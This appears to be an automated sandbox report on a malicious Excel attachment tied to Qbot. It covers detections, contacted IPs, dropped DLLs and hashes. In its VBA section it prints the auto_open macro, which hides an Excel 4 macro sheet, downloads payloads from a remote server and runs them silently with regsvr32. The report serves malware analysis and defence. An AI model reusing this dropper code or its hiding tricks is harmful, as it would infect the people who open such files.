C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat	16%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
6.2.regsvr32.exe.2710000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen2		Download File
13.2.regsvr32.exe.1510000.7.unpack	100%	Avira	TR/Crypt.XPACK.Gen2		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.%s.comPA	0%	URL Reputation	safe
http://190.14.37.187/44467.926671412.dat	0%	Avira URL Cloud	safe
http://servername/isapibackend.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://190.14.37.187/44467.926671412.dat	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881939093.0000000001FD0000.00000002.00020000.sdmp	false	URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	regsvr32.exe, 00000006.00000002.616692912.00000000020E0000.00000002.00020000.sdmp	false		high
http://servername/isapibackend.dll	regsvr32.exe, 00000005.00000002.619981269.0000000001C90000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.616276328.0000000001DE0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.620593142.0000000001CE0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.621391071.0000000001C40000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.633974439.0000000000970000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.141.27.213	unknown	Netherlands	60117	HSAE	false
190.14.37.187	unknown	Panama	52469	OffshoreRacksSAPA	false
94.140.112.126	unknown	Latvia	3212	TELEMACHBroadbandAccessCarrierServicesSI	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	492661
Start date:	28.09.2021
Start time:	22:13:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CompensationClaim-1630636598-09282021.xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLS@25/6@0/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 22.5% (good quality ratio 21.5%) Quality average: 77.5% Quality standard deviation: 26.4%
HCA Information:	Successful, ratio: 86% Number of executed functions: 130 Number of non-executed functions: 80
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Changed system and user locale, location and keyboard layout to English - United States Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
22:15:55	API Interceptor	27x Sleep call for process: regsvr32.exe modified
22:15:56	API Interceptor	864x Sleep call for process: explorer.exe modified
22:15:59	API Interceptor	1x Sleep call for process: schtasks.exe modified
22:16:00	Task Scheduler	Run new task: rzbsnuprv path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.141.27.213	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse
190.14.37.187	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse	190.14.37.187/44467.9218096065.dat
94.140.112.126	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HSAE	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse	185.141.27.213
	xls.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-2100058996-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1657705079-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	#Qbot downloader.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	185.183.96.67
	KHI13mrm4c.exe	Get hash	malicious	Browse	185.183.98.2
	Copy of Payment-228607772-09222021.xls	Get hash	malicious	Browse	185.82.202.248
	NJS4hNBeUR.exe	Get hash	malicious	Browse	185.198.57.68
	rQoEGMGufv.exe	Get hash	malicious	Browse	185.45.192.203
	5ya8R7LxXl.exe	Get hash	malicious	Browse	185.45.192.203
	Uz2eSldsZe.exe	Get hash	malicious	Browse	185.45.192.203
	SWIFT_COPY.htm	Get hash	malicious	Browse	194.36.191.196
	3hTS09wZ7G.exe	Get hash	malicious	Browse	185.183.96.3
	040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exe	Get hash	malicious	Browse	185.183.96.3
	OC2Z0JbqfA.exe	Get hash	malicious	Browse	185.183.96.3
	89o9iHBGiB.exe	Get hash	malicious	Browse	185.183.96.3
OffshoreRacksSAPA	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse	190.14.37.187
	xls.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-2100058996-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-1657705079-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-1214892625-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	#Qbot downloader.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-2308017-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Compensation-1730406737-09272021.xls	Get hash	malicious	Browse	190.14.37.178
	Claim-838392655-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	claim.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-1368769328-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-1763045001-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Claim-680517779-09242021.xls	Get hash	malicious	Browse	190.14.37.173
	Payment-687700136-09212021.xls	Get hash	malicious	Browse	190.14.37.232
	Permission-851469163-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-851469163-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-830724601-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-830724601-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse
C:\Users\user\Drezd.red	CompensationClaim-1033191014-09282021.xls	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.926671412[1].dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	259072
Entropy (8bit):	5.307481689640455
Encrypted:	false
SSDEEP:	3072:0PQdEOItJPxluIalXQOr+nxQNBO0jTL23i7eBnaVImWeqSR4G78SYSuDSMv6UWo:MUr+nxQNBO0jf2Ee5aSzeF4DSY7Dh6e
MD5:	EBEC2F5AC1E5F9D51D12FF7131795C35
SHA1:	2C07EE3F23FD2A62373412D67DDBCA312445D29E
SHA-256:	405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
SHA-512:	0152F35C26DA5DAD857A5B8C23BD802D9B730D91C1916A25374B957440971FA6A2716F3C3F20FDF5343B752CE152511EC0D54122CD494957673221A28864C99A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Joe Sandbox View:	Filename: CompensationClaim-1033191014-09282021.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.\|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...\|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	162688
Entropy (8bit):	4.254422803157279
Encrypted:	false
SSDEEP:	1536:C6QL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CdJNSc83tKBAvQVCgOtmXmLpLm4l
MD5:	3DBFF75AC25572D4B0F2865103664EAE
SHA1:	56496CA3507BD50E349E7F8E14AB7D77D801C109
SHA-256:	98FB6FA793E4DD244DFAC50A6C8CE9872D6ED31C2006800249FBB89C7FB6F0C9
SHA-512:	6EF69191B464BDC7D511A978E76419FC261C150155EC3B1A2A3E04F5E43508A5A3B648A489D477BB6712015C169BE834771F3B851D3F47545FD7C8D5C211ECF6
Malicious:	false
Preview:	MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........\|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0......*..\+...+..$,...,...,..P-...-......\|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................

C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	15676
Entropy (8bit):	4.533222048457847
Encrypted:	false
SSDEEP:	192:CQxlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:N38xesT20lheZ3waE5D7qxIxkxe
MD5:	1D97F290DD63310568E6CF7D2E6DA61A
SHA1:	779388C0D863F0F2E9B4FFFF268CC38706F90E7D
SHA-256:	368281B5F78DD318F6DB95E82D80183F3998B6B9462E8933914FDAF22CBA5508
SHA-512:	2F564CD7F7FABC38222FC8FE197767425F3FE153911982192D8C8CEFC79AA6729044071D51C74BB33A945E9DD3381B75DC184AD8185055DE3AC745F588E47351
Malicious:	false
Preview:	MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... .................d.$.D.2.....b.........E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......\|...K..a...

C:\Users\user\Drezd.red Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	259072
Entropy (8bit):	2.3809766777560206
Encrypted:	false
SSDEEP:	1536:ar2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:KC6MtAAFNJ5XC5SYCi02r+J
MD5:	2668EB3008687022521F18765324BE31
SHA1:	260C9F618207ACE946E94FB3EF7D000536BE0636
SHA-256:	2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989
SHA-512:	0A880B74E8137EF1ADA7CFA03871AA69105444296229C1B4B71412FED43156A0EFB5145B0944EC6C39AB65CB880E7514F74820958862A88AAA7CDD150EBEB399
Malicious:	true
Joe Sandbox View:	Filename: CompensationClaim-1033191014-09282021.xls, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.\|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...\|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Sep 28 08:54:40 2021, Security: 0
Entropy (8bit):	7.060522557731598
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	CompensationClaim-1630636598-09282021.xls
File size:	140288
MD5:	f3e5e9eb94f7bc0115c4b373093d085d
SHA1:	2142f513fa165dbc4fe13d5aa1ccc10f029f31c5
SHA256:	a57b036af033da6944bb62320662310585d2f23b1d275cd7f01f9c786608e551
SHA512:	cf181030596ad4c6c98c2494c547ce3e1463714c324bd28f82e9b06a1fb6a8e106f4cbbdc6181d64cbcb1c37aa55bcd3261c47e68b0e1a7bd25f6d4cac635278
SSDEEP:	3072:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdAH11ScHlwFPYidH4C1TsNku0KRjkR+T99:Yk3hOdsylKlgxopeiBNhZF+E+W2kdAmi
File Content Preview:	........................>.......................................................b..............................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "CompensationClaim-1630636598-09282021.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1251
Author:	Test
Last Saved By:	Test
Create Time:	2015-06-05 18:17:20
Last Saved Time:	2021-09-28 07:54:40
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1251
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General
Stream Path:	_VBA_PROJECT_CUR/UserForm2
VBA File Name:	UserForm2
Stream Size:	-1
Data ASCII:
Data Raw:

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{67AAEC34-898C-47F8-855C-D3D5130D6038}{5E676636-BB8A-47DD-A223-6BA0EFDD38F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

VBA File Name: Module1, Stream Size: 1120

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module1
VBA File Name:	Module1
Stream Size:	1120
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 d8 03 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code
`Attribute VB_Name = "Module1" Function jgfjgjfhfhf() Set Fera = Excel4IntlMacroSheets Fera.Add.Name = "Sheet777" End Function`

VBA File Name: Module5, Stream Size: 3869

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Module5
VBA File Name:	Module5
Stream Size:	3869
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 01 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 5d 0c 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Module5"

Sub auto_open()
On Error Resume Next
Trewasd = "REGISTER"
Drezden = "="
Naret = "EXEC"
Application.ScreenUpdating = False
jgfjgjfhfhf
Sheets("Sheet777").Visible = False
Sheets("Sheet777").Range("A1:M100").Font.Color = vbWhite

Sheets("Sheet777").Range("H24") = UserForm2.Label1.Caption
Sheets("Sheet777").Range("H25") = UserForm2.Label3.Caption
Sheets("Sheet777").Range("H26") = UserForm2.Label4.Caption

Sheets("Sheet777").Range("K17") = "=NOW()"
Sheets("Sheet777").Range("K18") = ".dat"
Sheets("Sheet777").Range("K18") = ".dat"


Sheets("Sheet777").Range("H35") = "=" & "H" & "ALT()"
Sheets("Sheet777").Range("I9") = UserForm2.Label2.Caption
Sheets("Sheet777").Range("I10") = UserForm2.Caption
Sheets("Sheet777").Range("I11") = "J" & "J" & "C" & "C" & "B" & "B"
Sheets("Sheet777").Range("I12") = "Byukilos"
Sheets("Sheet777").Range("G10") = "..\Drezd.red"
Sheets("Sheet777").Range("G11") = "..\Drezd1.red"
Sheets("Sheet777").Range("G12") = "..\Drezd2.red"
Sheets("Sheet777").Range("I17") = "regsvr32 -silent ..\Drezd.red"
Sheets("Sheet777").Range("I18") = "regsvr32 -silent ..\Drezd1.red"
Sheets("Sheet777").Range("I19") = "regsvr32 -silent ..\Drezd2.red"
Sheets("Sheet777").Range("H10") = "=Byukilos(0,H24&K17&K18,G10,0,0)"
Sheets("Sheet777").Range("H11") = "=Byukilos(0,H25&K17&K18,G11,0,0)"
Sheets("Sheet777").Range("H12") = "=Byukilos(0,H26&K17&K18,G12,0,0)"
Sheets("Sheet777").Range("H9") = Drezden & Trewasd & "(I9,I10&J10,I11,I12,,1,9)"
Sheets("Sheet777").Range("H17") = Drezden & Naret & "(I17)"
Sheets("Sheet777").Range("H18") = Drezden & Naret & "(I18)"
Sheets("Sheet777").Range("H19") = Drezden & Naret & "(I19)"


Application.Run Sheets("Sheet777").Range("H1")

End Sub

Sub auto_close()
On Error Resume Next
Application.ScreenUpdating = True
   Application.DisplayAlerts = False
   Sheets("Sheet777").Delete
   Application.DisplayAlerts = True
End Sub

VBA File Name: Sheet1, Stream Size: 991

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1
Stream Size:	991
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook, Stream Size: 2393

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook
Stream Size:	2393
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 4d 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit

Private m_openAlreadyRan As Boolean
Private m_isOpenDelayed As Boolean

Friend Sub FireOpenEventIfNeeded(Optional dummyVarToMakeProcHidden As Boolean)
End Sub

Private Sub asWorkbook_Activateas()

End Sub

Private Sub saWorkbook_Opensa()
    On Error Resume Next


End Sub

Private Sub ssaaInitWorkbookssaa()
    On Error Resume Next

    If VBA.Val(Application.Version) < 12 Then
        Me.Close False
        Exit Sub
    End If
    '
        'Other code
        '
        '
        '
End Sub

VBA File Name: UserForm2, Stream Size: 1181

General
Stream Path:	_VBA_PROJECT_CUR/VBA/UserForm2
VBA File Name:	UserForm2
Stream Size:	1181
Data ASCII:	. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{67AAEC34-898C-47F8-855C-D3D5130D6038}{5E676636-BB8A-47DD-A223-6BA0EFDD38F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 108

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	108
Entropy:	4.29316615018
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 1e 4d 69 63 72 6f 73 6f 66 74 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 05 05 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	244
Entropy:	2.65175227267
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 208

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	208
Entropy:	3.33231709703
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . % . > . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 111238

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	111238
Entropy:	7.57013249535
Base64 Encoded:	True
